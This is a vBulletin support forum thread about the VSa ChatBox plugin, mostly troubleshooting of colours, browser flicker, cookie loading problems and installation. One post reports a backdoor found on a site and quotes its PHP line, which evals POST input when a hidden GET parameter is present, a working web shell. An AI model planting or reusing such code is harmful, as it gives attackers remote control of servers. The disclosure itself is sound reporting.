Valter, do you have a lite version of this, or the ability to put this into a widget on the vBulletin CMS?

I am willing to pay to have a small widget made just for this reason, small and simple ajax or ?? Need it to be on my main CMS page. Can you PM me ? Thank you!

Mike

How can I change the default font color to be the same as the same default font color in a template?

I mean, the default font color right now is black which works fine with vB Default template, but not so much with Blackend or DarkVision Yellow[Fixed], where background is black/dark gray.

So is it possible for chatbox to use the default font color of the template instead?

Joey Link 05-14-2011 03:38 PM

Is there any way to apply a word filter to the chatbox to prevent profanity?

MaestroTPG 05-18-2011 12:09 AM

I've looked around but cannot find the name of the icon I seem to be missing. This is a fresh install of VB Pub suite and of the chatbox. Smiles appear but the gold doc icon is gone/didnt install. How do I go about fixing this all skins are the same even the default.

You didn't look very hard. The first rule of installing modifications is to read the entire thread. Or at least the last few pages.

In this case the answer is just a few posts up, but it's been discussed ad nauseaum before that. https://vborg.vbsupport.ru/showpost....postcount=1710

magic74 05-18-2011 11:44 AM

It would be perfect if the members get the choice to choose a sound when a new message had been posted.

Also it would be great to choose a text-background.

With these two modifications the add-on would be perfect for us.

Great product.

How do I change the colour of the shout box so it looks the same as the rest of my forum?

Diddy Kong 05-18-2011 08:17 PM

IS there a list of colours I can add to this?

Videx 05-18-2011 09:51 PM

Color customization questions crop up here all the time, but I'm not sure anyone has figured it out. Or if they have I missed it. I use only the default style, or close children of it, which seem to work fine.

Go back through the entire thread and read each post very carefully. If you can find the answer please take the time to prepare a step-by-step that we can point future questioners to.

ellinofatsa 05-19-2011 07:52 PM

sound with new mesage here is that inposible?

Diddy Kong 05-22-2011 11:56 AM

A few of my members have said that this isn't working properly in chrome.

It is fine in firefox and other browsers.

However in chrome the shoutbox keeps moving and is always flickering.

Probably a style issue, but who knows since you haven't given us a link/test account to see for ourselves. You also haven't said how it behaves for you in Chrome.

FWIW, mine looks fine on my forum in Chrome 11.

Sorry here is the link:

http://www.lfc4life.net/forum/forum.php

I don't use chrome. I use either firefox or IE. It works fine for me.

But my members have had problems using IE and Firefox.

bryanie 05-23-2011 02:02 PM

I have a security issue related to this plugin. Today I noticed a plugin called "VSa - ChatBox -ILL" on my site, listed under product vBulletin (not the chatbox product). The plugin code was

Code:

if(isset($_GET['aimn++++'])){echo "<h1>jkrose</h1><pre>";eval($_POST[shuix]);exit;}
If I'm reading this correctly, it will allow remote PHP code execution on my server. I do not know if there is a vulnerability in the chatbox code, or if my site was targeted because I have the chatbox installed, but either way I figured you should know about it.

That URL isn't resolving for me. As an admin you must install all the browsers, including Chrome and Safari, so you can test these things. Really, it would almost have taken less time to install Chrome than to type that you didn't have it. I wouldn't worry about it if it works for you as there probably isn't much you can do anyway. Maybe some kind of odd video issue on their computer.

Thanks for the notice. I do not have this plugin. I like to think it was installed by one of your [former] admins, as opposed to an outside hacker, but who knows. Presumably they used the name of an existing plugin at random to make it harder to notice. I'd watch for it reappearing, change everyone's passwords including cpanel and ftp, and consider wiping the site clean and reinstalling everything.

As a chatbox, it's pretty resource-heavy. If that's an issue, you should look into using a hosted solution.

I have tried it in chrome and it doesn't work as well for me either. It flickers constantly.

I know a few members who have had this problem.

Just letting you know, as other people might have had the same problem.

Just out of curiosity if nothing else I'd like to see it. The URL is now resolving, but you forgot to enable the box for guests or give us a test account login, so I can't see it.

New install of 4.1.3 + latest VSA. Everything working fine, but had to change VB Cookie Domain to .example.com to fix a login loop occurring when accessed from http://example.com vs http://www.example.com.

Now, everything still works except for VSA is stuck in Loading when the site is accessed via http://example.com.

I've read the forums a few times and can't find this specific issue.

Thanks in advance,

Thanks for the reply, much appreciated.

Seems to be the same on FF/Safari/Chrome/Mobile Safari. Strange it's only when I access it through example.com vs www.example.com. Not a coder by any means, but can't seem to find where it might be when going through it. Been trying to think of a workaround but no way to distinguish a user coming in on www vs nonWWW.

-innova

Ozymandyus 05-27-2011 06:46 PM

I don't think that's a problem with ChatBox per se, but sounds like the global cookie setting for your vBulletin installation might be misconfigured. You might play around under Options, Cookies and HTTP Header Options, Cookie Domain. Sometimes modifying that setting can help with situations like this.

Just found a good workaround, and it keeps with SEO best practices as well, figured I'd share since too many people figure out their problems and don't post the fix.

Using .htaccess to redirect nonWWW to www.

Options +FollowSymlinks
RewriteEngine on
rewritecond %{http_host} ^domain.com [nc]
rewriterule ^(.*)$ http://www.domain.com/$1 [r=301,nc]

Too many people figure out their problems and don't post the fix, so thanks again for the replies.

Source of fix

Is it possible the admin to add a sticky message in this chatbox ?

ghaleon7 05-28-2011 08:32 AM

Why am I getting this message: Warning: fetch_template() calls should be replaced by the vB_Template class. Template name: Display_Visitors_User in [path]/includes/functions.php on line 4097 ?

Valter 05-28-2011 12:40 PM

"Display_Visitors_User" is not part of this product.

dany_danay 05-28-2011 06:22 PM

wrong post

leejohn02 05-28-2011 07:45 PM

right since i got bumped can someone please tell me how i can make the mod delete for all moderators and not admins only or does no one actually no

RC-Central 05-29-2011 02:07 AM

I installed today and it always says Loading and Status says Loading also... Any ideas? :erm:

When something is written it says:

Your submission could not be processed because a security token was missing.

If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.

Did you even read just a few posts back???? https://vborg.vbsupport.ru/showpost....postcount=1752

The very first thing you must do before installing any mod is to read through the entire thread. The reason you must do this is because if you don't you'll just end up knocking your head against the wall while looking damn silly.

Successfulsteps 05-29-2011 05:24 AM

This is my first mod I installed and it did not work :(

Installation:
-Import XML file (as product): AdminCP > Plugin System > Manage Products > [Add/Import Product]

Did the above, but had no idea what to put as the Product ID or Version Check Url, and it seems it really wants all those boxes filled in, so I just put the name as product id with the _ in between them, and same url as this thread for version although that doesn't work.

To add to desired template (example FORUMHOME):
1. Add 'index' to THIS_SCRIPT locations (Product options)
2. Add 'FORUMHOME' to template names (Product options)
3. Open 'FORUMHOME' template and put "{vb:raw vsachatbox}" to desired line (for example after '<!-- /main -->') -> Save

Did #3, not sure what you mean by #1 and #2, so I didn't know what to do on them.

To set options:
Go to: AdminCP > vBulletin Options > VSa - ChatBox

It's not there in the Options. What am I missing here? I have the MSG chatbox on and want to replace it with this one, is that why?

Valter 05-29-2011 09:48 AM

You are trying to create new plugin.

This is complete mod, so you just need to install it.

AdminCP > Plugin System > Manage Products > [Add/Import Product]

[Add/Import Product] is found below list of installed products on "Manage Products" page.

[Add/Import Product] is found below list of installed products on "Manage Products" page.

I did that part, after Add/Import, it has a screen to fill out with the information, am I just not supposed to put the name of the mod in and what about the product ID? I thought I did everything right on the import, but it just isn't showing up on my options. I didn't know if that was because I still had the other chatbox enabled?

If you read what I wrote above though, I thought I followed the directions like you had them, with the exceptions of the #'s above I didn't understand.
